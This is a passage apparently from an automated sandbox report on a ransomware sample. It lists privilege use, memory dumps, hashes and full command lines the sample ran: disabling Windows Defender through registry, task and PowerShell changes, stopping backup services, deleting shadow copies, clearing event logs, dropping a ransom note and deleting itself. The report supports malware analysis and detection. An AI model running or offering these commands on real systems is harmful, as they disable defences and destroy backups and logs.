| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe
"C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_1643c" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1643c" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_1643c" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\notepad.exe
notepad.exe C:\iotb_HOW_TO_DECRYPT.txt
C:\Windows\SysWOW64\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"
C:\Windows\SysWOW64\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/2832-115-0x0000000000000000-mapping.dmp
memory/4152-116-0x0000000000000000-mapping.dmp
memory/4036-117-0x0000000000000000-mapping.dmp
memory/3080-118-0x0000000000000000-mapping.dmp
memory/3980-119-0x0000000000000000-mapping.dmp
memory/4196-120-0x0000000000000000-mapping.dmp
memory/4188-121-0x0000000000000000-mapping.dmp
memory/4396-122-0x0000000000000000-mapping.dmp
memory/4384-123-0x0000000000000000-mapping.dmp
memory/4436-124-0x0000000000000000-mapping.dmp
memory/4336-125-0x0000000000000000-mapping.dmp
memory/3228-126-0x0000000000000000-mapping.dmp
memory/3784-127-0x0000000000000000-mapping.dmp
memory/4508-128-0x0000000000000000-mapping.dmp
memory/4512-129-0x0000000000000000-mapping.dmp
memory/452-130-0x0000000000000000-mapping.dmp
memory/612-131-0x0000000000000000-mapping.dmp
memory/840-132-0x0000000000000000-mapping.dmp
memory/432-133-0x0000000000000000-mapping.dmp
memory/1116-134-0x0000000000000000-mapping.dmp
memory/1280-135-0x0000000000000000-mapping.dmp
memory/1508-136-0x0000000000000000-mapping.dmp
memory/1712-137-0x0000000000000000-mapping.dmp
memory/1920-138-0x0000000000000000-mapping.dmp
memory/2232-139-0x0000000000000000-mapping.dmp
memory/2404-140-0x0000000000000000-mapping.dmp
memory/2648-141-0x0000000000000000-mapping.dmp
memory/3008-142-0x0000000000000000-mapping.dmp
memory/3812-143-0x0000000000000000-mapping.dmp
memory/4520-144-0x0000000000000000-mapping.dmp
memory/4784-145-0x0000000000000000-mapping.dmp
memory/4888-146-0x0000000000000000-mapping.dmp
memory/4664-147-0x0000000000000000-mapping.dmp
memory/2896-148-0x0000000000000000-mapping.dmp
memory/4916-149-0x0000000000000000-mapping.dmp
memory/4564-150-0x0000000000000000-mapping.dmp
memory/4600-151-0x0000000000000000-mapping.dmp
memory/4884-152-0x0000000000000000-mapping.dmp
memory/5024-153-0x0000000000000000-mapping.dmp
memory/1100-154-0x0000000000000000-mapping.dmp
memory/2196-155-0x0000000000000000-mapping.dmp
memory/736-156-0x0000000000000000-mapping.dmp
memory/4956-157-0x0000000000000000-mapping.dmp
memory/4828-158-0x0000000000000000-mapping.dmp
memory/712-159-0x0000000000000000-mapping.dmp
memory/1108-160-0x0000000000000000-mapping.dmp
memory/1240-161-0x0000000000000000-mapping.dmp
memory/2952-162-0x0000000000000000-mapping.dmp
memory/1824-163-0x0000000000000000-mapping.dmp
memory/1940-164-0x0000000000000000-mapping.dmp
memory/2244-165-0x0000000000000000-mapping.dmp
memory/2736-166-0x0000000000000000-mapping.dmp
memory/3324-167-0x0000000000000000-mapping.dmp
memory/4672-168-0x0000000000000000-mapping.dmp
memory/332-169-0x0000000000000000-mapping.dmp
memory/2668-170-0x0000000000000000-mapping.dmp
memory/3732-171-0x0000000000000000-mapping.dmp
memory/3264-172-0x0000000000000000-mapping.dmp
memory/4116-173-0x0000000000000000-mapping.dmp
memory/3444-174-0x0000000000000000-mapping.dmp
memory/3652-175-0x0000000000000000-mapping.dmp
memory/4064-176-0x0000000000000000-mapping.dmp
memory/3192-177-0x0000000000000000-mapping.dmp
memory/4176-178-0x0000000000000000-mapping.dmp
memory/3320-179-0x00000000010E0000-0x00000000010E1000-memory.dmp
memory/3320-180-0x00000000010E0000-0x00000000010E1000-memory.dmp
memory/3320-181-0x0000000004A10000-0x0000000004A46000-memory.dmp
memory/3320-182-0x00000000075B0000-0x0000000007BD8000-memory.dmp
memory/3320-183-0x0000000007380000-0x00000000073A2000-memory.dmp
memory/3320-184-0x0000000007520000-0x0000000007586000-memory.dmp
memory/3320-185-0x0000000007C50000-0x0000000007CB6000-memory.dmp
memory/3320-186-0x00000000049C0000-0x00000000049C1000-memory.dmp
memory/3320-187-0x00000000049C2000-0x00000000049C3000-memory.dmp
memory/3320-188-0x0000000007F40000-0x0000000008290000-memory.dmp
memory/3320-189-0x0000000007C20000-0x0000000007C3C000-memory.dmp
memory/3320-190-0x0000000008290000-0x00000000082DB000-memory.dmp
memory/3320-191-0x0000000008570000-0x00000000085E6000-memory.dmp
memory/3320-192-0x00000000010E0000-0x00000000010E1000-memory.dmp
memory/3320-200-0x00000000075B0000-0x0000000007BD8000-memory.dmp
memory/3320-201-0x00000000095D0000-0x0000000009603000-memory.dmp
memory/3320-202-0x00000000095D0000-0x0000000009603000-memory.dmp
memory/3320-203-0x0000000007380000-0x00000000073A2000-memory.dmp
memory/3320-204-0x0000000007520000-0x0000000007586000-memory.dmp
memory/3320-205-0x0000000007C50000-0x0000000007CB6000-memory.dmp
memory/3320-206-0x0000000008290000-0x00000000082DB000-memory.dmp
memory/3320-207-0x0000000008570000-0x00000000085E6000-memory.dmp
memory/3320-208-0x00000000093B0000-0x00000000093CE000-memory.dmp
memory/3320-213-0x0000000009710000-0x00000000097B5000-memory.dmp
memory/3320-214-0x000000007F1D0000-0x000000007F1D1000-memory.dmp
memory/3320-215-0x0000000009930000-0x00000000099C4000-memory.dmp
memory/3320-282-0x00000000049C3000-0x00000000049C4000-memory.dmp
memory/3320-409-0x0000000009890000-0x00000000098AA000-memory.dmp
memory/3320-414-0x0000000009890000-0x00000000098AA000-memory.dmp
memory/3320-415-0x0000000009870000-0x0000000009878000-memory.dmp
memory/3320-420-0x0000000009870000-0x0000000009878000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
memory/2868-433-0x0000000000CC0000-0x0000000000CF6000-memory.dmp
memory/2868-434-0x0000000006ED0000-0x00000000074F8000-memory.dmp
memory/2868-435-0x0000000006DD0000-0x0000000006DF2000-memory.dmp
memory/2868-436-0x00000000075E0000-0x0000000007646000-memory.dmp
memory/2868-437-0x0000000007500000-0x0000000007566000-memory.dmp
memory/2868-438-0x0000000007650000-0x00000000079A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 932fbbcec97a66cb6d8b534b3adcb522 |
| SHA1 | 4b4e0903311f976910faf1ad20e79a1fd258d70e |
| SHA256 | 15a4ba93d79fe7fe5ae613f220df3c078a346279c46b013142827489aab25101 |
| SHA512 | 3e150fa1e954b3a8bad6b72c0025eb89f2c121271da9e2c6d3f941c389f5f419394d98b1b8e0d729abd1b05e8bd243838e15cdec3e1e4c64ea28ccf84177e4e5 |
memory/2868-440-0x00000000079A0000-0x00000000079BC000-memory.dmp
memory/2868-441-0x00000000079E0000-0x0000000007A2B000-memory.dmp
memory/2868-442-0x0000000000F60000-0x0000000000F61000-memory.dmp
memory/2868-443-0x0000000000F62000-0x0000000000F63000-memory.dmp
memory/2868-444-0x0000000007C90000-0x0000000007D06000-memory.dmp
memory/2868-453-0x0000000006ED0000-0x00000000074F8000-memory.dmp
memory/2868-454-0x0000000008B80000-0x0000000008BB3000-memory.dmp
memory/2868-456-0x0000000006DD0000-0x0000000006DF2000-memory.dmp
memory/2868-455-0x0000000008B80000-0x0000000008BB3000-memory.dmp
memory/2868-457-0x00000000075E0000-0x0000000007646000-memory.dmp
memory/2868-458-0x0000000007500000-0x0000000007566000-memory.dmp
memory/2868-459-0x00000000079E0000-0x0000000007A2B000-memory.dmp
memory/2868-460-0x0000000007C90000-0x0000000007D06000-memory.dmp
memory/2868-461-0x0000000008B60000-0x0000000008B7E000-memory.dmp
memory/2868-466-0x0000000008BD0000-0x0000000008C75000-memory.dmp
memory/2868-467-0x0000000009070000-0x0000000009104000-memory.dmp
memory/2868-471-0x0000000000F63000-0x0000000000F64000-memory.dmp
memory/2868-470-0x000000007F460000-0x000000007F461000-memory.dmp
memory/2868-662-0x0000000009040000-0x000000000905A000-memory.dmp
memory/2868-667-0x0000000009040000-0x000000000905A000-memory.dmp
memory/2868-668-0x0000000009030000-0x0000000009038000-memory.dmp
memory/2868-673-0x0000000009030000-0x0000000009038000-memory.dmp